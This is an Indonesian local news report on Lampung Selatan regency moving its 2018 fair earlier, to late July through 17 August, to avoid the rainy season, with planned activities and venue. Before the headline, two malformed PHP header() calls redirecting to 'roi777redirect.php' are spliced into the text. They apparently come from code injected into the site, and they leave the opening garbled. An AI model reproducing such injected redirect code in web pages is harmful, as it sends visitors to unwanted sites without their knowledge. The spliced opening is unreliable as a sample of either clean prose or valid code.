header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Agenda LSF 2018 Maju -
Agenda LSF 2018 Maju

TRANSLAMPUNG.COM, KALIANDA – Pemerintah Kabupaten Lampung Selatan akan memajukan jadwal pelaksanaan event Lampung Selatan Fair (LSF) 2018.

Asisten Ekobang Mulyadi Saleh mengatakan, rencananya event pelaksanaan LSF akan digelar pada 30 Juli -17 Agustus. Dimana untuk jadual tersebut untuk menghindari cuaca buruk karena biasanya, acara LSF dilaksanakan pada November tak jauh dari hari peringatan Hari Ulang Tahun (HUT) Kabupaten Lampung Selatan yang jatuh para tanggal 14 November yang sudah memasuki musim penghujan.

“Kita menghindari itu, makanya ini dimajukan. Tapi ini tidak menghilangkan image, perayaan HUT kabupaten. Kita ingin, kegiatan ini dapat meningkatkan animo masyarakat Kalianda dan sekitarnya yang tinggi saat dilaksanakan acara LSF,” kata dia ditemui diseputaran kantor bupati, Senin (2/7).

Kegiatan LSF nanti, lanjut dia akan dirangkaikan dengan kegiatan peringatan Hari Keluarga Nasional (Harganas) Tingkat Provinsi Lampung dan peringatan Hari Kemerdekaan 17 Agustus.

“Ini akan beda dengan pelaksanaan tahun-tahun sebelumnya, nanti diikuti juga oleh peserta Harganas dan Peringatan HUT-RI. Oleh karena itu, seluruh OPD dapat ikut berperan dalam acara LSF tahun 2018. Dimana, setiap OPD dapat menyajikan kegiatan yang juga langsung dapat dilombakan. Seperti, Dinas Pariwisata dan Kebudayaan menggelar parade Festival Adat Sai Batin, Dinas Pemuda dan Olahraga menggelar Fun Bike dan Dinas Pendidikan semacam lomba Drumband,” jelasnya.

“Contohnya seperti itu. Setiap OPD dapat melaksanakan hal yang semacam itu,” tegasnya.

Untuk lokasi panggung utama, ditambahkan dia rencananya akan ditempatkan di Lapangan Cipta Karya, Kalianda.

“Rencananya masih seperti tahun lalu, di lapangan Cipta Karya. Tapi semuanya masih berageser, karena ini baru rapat persiapan pertama,” pungkasnya. (jhn/hkw)

News Reporter